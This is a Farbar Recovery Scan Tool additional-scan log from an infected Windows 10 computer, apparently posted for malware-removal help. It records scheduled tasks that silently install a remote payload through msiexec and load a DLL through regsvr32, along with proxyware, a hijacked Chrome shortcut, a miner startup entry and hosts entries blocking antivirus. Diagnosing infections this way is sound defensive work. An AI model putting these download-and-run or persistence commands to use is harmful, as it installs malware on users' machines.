Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017 Ran by Zrujnowanyxd9 (27-04-2017 19:33:52) Running from D:\frst Windows 10 Pro Version 1511 (X64) (2017-03-30 18:13:09) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3012374695-455075304-3318307465-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3012374695-455075304-3318307465-503 - Limited - Disabled) Guest (S-1-5-21-3012374695-455075304-3318307465-501 - Limited - Disabled) Zrujnowanyxd9 (S-1-5-21-3012374695-455075304-3318307465-1001 - Administrator - Enabled) => C:\Users\Zrujnowanyxd9 ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden Gyazo 3.3.1 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.) H1Z1: King of the Kill (HKLM\...\Steam App 433850) (Version: - Daybreak Game Company) League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games) League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden Microsoft OneDrive (HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8083 - Realtek Semiconductor Corp.) Skype™ 7.35 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.35.101 - Skype Technologies S.A.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\TeamSpeak 3 Client) (Version: 3.1.3 - TeamSpeak Systems GmbH) WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {08B220ED-CA63-47C0-9B96-D2E786BF8F95} - System32\Tasks\Hmechhebity Engine => C:\Program Files (x86)\Guqasp\xckehither.exe Task: {35E3854B-B5D3-40F3-B506-B09AC0377F47} - System32\Tasks\Online Special Application V2G2 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: {3FA55C77-A4F6-4C43-9942-AD689BB4982D} - \{0E057A47-0D09-047E-0A11-050E0B7F1105} -> No File <==== ATTENTION Task: {40DD700B-4A6B-47B3-BCCB-68C47C3E4333} - \Arilile -> No File <==== ATTENTION Task: {7347C4FD-5AF2-4A9A-92DB-63850708F081} - System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A} => C:\ProgramData\{2B503F68-9CFB-88C3-E447-8D56CAAA9236}\A7C6278E-106D-9025-035E-B160DBE6199D.exe <==== ATTENTION Task: {80BC49A2-C9FD-49A6-B72D-EF6CA8B7934D} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-02-10] (Advanced Micro Devices, Inc.) Task: {86AAEC1D-5DA8-4571-BD63-FF2D210305B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-16] (Google Inc.) Task: {89EEBA59-2405-45B9-BE45-3F9841163E15} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] () Task: {8FEC6B15-A25B-4396-BB08-A9352F283B32} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic Task: {95BA9DB4-0939-40A0-9F2E-27B2238AD73A} - System32\Tasks\Online Special Application V2G1 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: {9D7C3408-FDCE-4C5D-A262-92319F6F32C6} - System32\Tasks\Updater_Online_Special_Application => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION Task: {A5EB08BF-A84C-4AC4-B892-591E4D26A10D} - System32\Tasks\Online Special Application V2G3 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: {BAE1CDC5-C0AC-422E-A1BC-662C1667448F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-16] (Google Inc.) Task: {CB64652F-D53B-42F3-8917-068748F6954D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q Task: {DD0ADC35-75A7-4934-871D-CCDF5A376D89} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] () Task: {FFE0E285-252E-477A-AC58-72B9786038E1} - System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\90361a19\aa2c3b22.dll" <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Online Special Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\Online Special Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\Online Special Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) ==================== Loaded Modules (Whitelisted) ============== 2017-03-31 12:46 - 2017-03-04 07:31 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll 2017-03-30 20:12 - 2017-03-30 20:12 - 00026112 _____ () C:\Windows\KMS-R@1n.exe 2017-04-11 21:29 - 2017-03-28 12:17 - 02656952 _____ () C:\Windows\system32\CoreUIComponents.dll 2017-03-31 14:11 - 2017-03-31 14:16 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2017-04-11 21:29 - 2017-03-28 12:17 - 02656952 _____ () C:\Windows\System32\CoreUIComponents.dll 2016-07-13 00:12 - 2016-07-13 00:12 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-07-13 00:22 - 2016-07-13 00:22 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2017-03-31 12:46 - 2017-03-04 05:19 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-03-31 12:46 - 2017-03-04 05:14 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-04-11 21:29 - 2017-03-28 07:01 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2017-04-11 21:29 - 2017-03-28 07:04 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2017-03-31 14:11 - 2017-03-31 14:16 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll 2017-03-31 14:11 - 2017-03-31 14:17 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2017-03-31 12:42 - 2017-03-10 02:13 - 00674592 _____ () D:\Program Files (x86)\Steam\SDL2.dll 2017-03-31 12:42 - 2016-09-01 03:02 - 04969248 _____ () D:\Program Files (x86)\Steam\v8.dll 2017-04-27 17:57 - 2017-04-26 01:55 - 02465056 _____ () D:\Program Files (x86)\Steam\video.dll 2017-03-31 12:42 - 2016-01-27 09:49 - 02549760 _____ () D:\Program Files (x86)\Steam\libavcodec-56.dll 2017-03-31 12:42 - 2016-01-27 09:49 - 00491008 _____ () D:\Program Files (x86)\Steam\libavformat-56.dll 2017-03-31 12:42 - 2016-01-27 09:49 - 00332800 _____ () D:\Program Files (x86)\Steam\libavresample-2.dll 2017-03-31 12:42 - 2016-01-27 09:49 - 00442880 _____ () D:\Program Files (x86)\Steam\libavutil-54.dll 2017-03-31 12:42 - 2016-01-27 09:49 - 00485888 _____ () D:\Program Files (x86)\Steam\libswscale-3.dll 2017-03-31 12:42 - 2016-09-01 03:02 - 01563936 _____ () D:\Program Files (x86)\Steam\icui18n.dll 2017-03-31 12:42 - 2016-09-01 03:02 - 01195296 _____ () D:\Program Files (x86)\Steam\icuuc.dll 2017-04-27 17:57 - 2017-04-26 01:55 - 00848672 _____ () D:\Program Files (x86)\Steam\bin\chromehtml.DLL 2017-03-31 12:42 - 2016-07-05 00:17 - 00266560 _____ () D:\Program Files (x86)\Steam\openvr_api.dll 2017-03-31 12:42 - 2017-01-30 23:41 - 68875552 _____ () D:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll 2017-04-27 16:51 - 2017-03-09 07:31 - 02187096 _____ () C:\Program Files (x86)\Everness\Application\libglesv2.dll 2017-04-27 16:51 - 2017-03-09 07:31 - 00086360 _____ () C:\Program Files (x86)\Everness\Application\libegl.dll 2017-04-27 16:51 - 2017-04-26 05:14 - 00108544 _____ () c:\programdata\apple\common\cloud\winhelper.dll 2017-04-27 16:51 - 2017-04-26 05:14 - 00108544 _____ () C:\ProgramData\Apple\Common\Cloud\WinHelper.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-10-30 09:24 - 2017-04-16 14:03 - 00000888 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 v1.ff.avast.com 127.0.0.1 vlcproxy.ff.avast.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3012374695-455075304-3318307465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == HKLM\...\StartupApproved\Run: => "Malwarebytes TrayApp" HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "PWAS4BY1OC4T7L5" HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "4FAWBDTDAXQ7DGI" HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "isMiner V 1.9" HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "BA70O5FIV3OXQ52" HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "RV45SKF07USE2PP" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{094289B8-CF1B-405A-9CEB-3AA38778D2C0}] => (Allow) C:\Windows\KMS-R@1n.exe FirewallRules: [{219FA7D0-04DB-44C7-AE11-2E0F81BCF95F}] => (Allow) C:\Windows\KMS-R@1n.exe FirewallRules: [{5677C33A-0C8E-4152-84C0-BBD0F78D2224}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{FA2A4710-D1E4-4DBE-9880-1C3977ED02A7}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{F463474C-0E5D-47EA-99A7-0605BBD11831}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BE7598E2-916A-404F-87BD-F56D61BF4B7F}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BF8A1F2B-12D3-40BE-9401-8E7F1E3E0ADB}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe FirewallRules: [{77B86A6A-4CD0-443C-9C7D-3E44B5BCB45B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe FirewallRules: [TCP Query User{1C4DC932-5E27-4E03-A92A-FA353C0BCC5E}D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe FirewallRules: [UDP Query User{3FF49A3C-044D-4C38-A4F2-16257118C04D}D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe FirewallRules: [{A8D87BB5-C364-4BC9-A5DD-165EC99E55D8}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{4A3150A9-FA69-4335-B12A-E40612140E5E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{E2842494-9D8A-432F-8631-8CD9AB10F6CB}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{354BFF14-58E3-451B-BC9A-F5D8E7C09499}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{F3EDF1CC-3946-4469-8CFF-9503385F0DEB}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxhdwd110_27qkmlgfsxx27qkmlgfsx.dat FirewallRules: [{41192BC5-94AA-4961-842E-A0A47022D60C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxhdwd110_27qkmlgfsxx27qkmlgfsx.dat FirewallRules: [{CE39AAF7-4C38-4689-B7B9-F8E1DCD8FC64}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe FirewallRules: [{E23DBC0F-6C2E-41DF-BD27-78ADF4C8DEC9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{B0CE0967-C713-4947-9305-C2D419DD3E04}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe ==================== Restore Points ========================= 19-04-2017 11:25:47 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= Name: Standard PS/2 Keyboard Description: Standard PS/2 Keyboard Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318} Manufacturer: (Standard keyboards) Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Microsoft PS/2 Mouse Description: Microsoft PS/2 Mouse Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Event log errors: ========================= Application errors: ================== Error: (04/27/2017 06:52:01 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program FRST64.exe version 27.4.2017.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 1ba4 Start Time: 01d2bf763ca7d0fc Termination Time: 4294967295 Application Path: D:\frst\FRST64.exe Report Id: d3a442f8-2b69-11e7-bc72-4ccc6ab08677 Faulting package full name: Faulting package-relative application ID: Error: (04/27/2017 04:56:12 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iSafeSvc.exe, version: 6.10.493.30849, time stamp: 0x5840f8ac Faulting module name: ntdll.dll, version: 10.0.10586.672, time stamp: 0x580efaf8 Exception code: 0xc0000005 Fault offset: 0x0003e26f Faulting process id: 0x127c Faulting application start time: 0x01d2bf65c5b8e73a Faulting application path: C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe Faulting module path: C:\Windows\SYSTEM32\ntdll.dll Report Id: 5c6767a9-8b11-4feb-906d-1ecae36dd271 Faulting package full name: Faulting package-relative application ID: Error: (04/27/2017 04:41:33 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-94VA4VB) Description: Activation of app Microsoft.WindowsCalculator_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/27/2017 04:41:33 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Calculator.exe version 10.1703.1703.1001 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: e48 Start Time: 01d2bf6452514fdf Termination Time: 4294967295 Application Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1703.601.0_x64__8wekyb3d8bbwe\Calculator.exe Report Id: 99b6dce7-2b57-11e7-bc72-4ccc6ab08677 Faulting package full name: Microsoft.WindowsCalculator_10.1703.601.0_x64__8wekyb3d8bbwe Faulting package-relative application ID: App Error: (04/26/2017 03:53:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mrt.exe, version: 5.47.13703.0, time stamp: 0x58dec9f9 Faulting module name: combase.dll, version: 10.0.10586.839, time stamp: 0x58ba4028 Exception code: 0xc0000005 Fault offset: 0x00000000000be805 Faulting process id: 0x850 Faulting application start time: 0x01d2be94803e3b99 Faulting application path: C:\Windows\system32\mrt.exe Faulting module path: C:\Windows\system32\combase.dll Report Id: 764a0d8b-dd0a-4293-aade-007f70655645 Faulting package full name: Faulting package-relative application ID: System errors: ============= Error: (04/27/2017 07:29:21 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-94VA4VB) Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout. Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The User Data Access_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service. Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The User Data Storage_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service. Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Contact Data_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service. Error: (04/27/2017 07:29:20 